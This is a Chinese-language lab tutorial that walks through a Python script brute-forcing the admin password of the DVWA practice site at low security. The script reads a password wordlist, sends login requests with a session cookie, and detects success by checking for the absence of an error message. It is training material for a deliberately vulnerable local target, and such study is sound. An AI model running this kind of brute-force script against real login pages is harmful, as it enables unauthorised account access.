python实现密码暴力破解

实战：DVWA靶场

靶场设置：low级别

判断是否登录成功：看返回的http请求里面是否有

Username and/or password incorrect.

我们这里假设知道用户名是admin不知道密码，要去破解密码

思路：

（1）从字典读取值，生成密码

pwds = open("password.txt") for pwd in pwds: print(pwd) pwds.close()

（2）http连接到需要爆破的地址

按F12查看标头，把你的PHPSEEEIONID复制到代码修改就可以

代码：

import requests # 如果第一个密码就提示成功，是 PHPSESSID 没有替换的问题 pwds = open("F:\\password.txt") for pwd in pwds: url = "http://localhost/dvwa/vulnerabilities/brute/" # PHPSESSID务必替换为登录以后的PHPSESSID resp = requests.get(url = url, params = {"username":"admin", "password":pwd.strip(), "Login":"Login"}, headers = {"Cookie":"security=low; PHPSESSID=13hjf2259tmmq16ukv2kdc59g6"}) #print(resp.text) if 'Username and/or password incorrect.' in resp.text: print('破解失败：'+pwd, end='') else: print('破解成功：'+pwd, end='') break; pwds.close()

（3）获得http响应，分析响应结果，看看有没有错误提示“Username and/or password incorrect.”

（4）如果有提示就继续下一次循环

（5）如果没有就代表爆破成功

破解成功

登录：用户名：admin，密码password

登录成功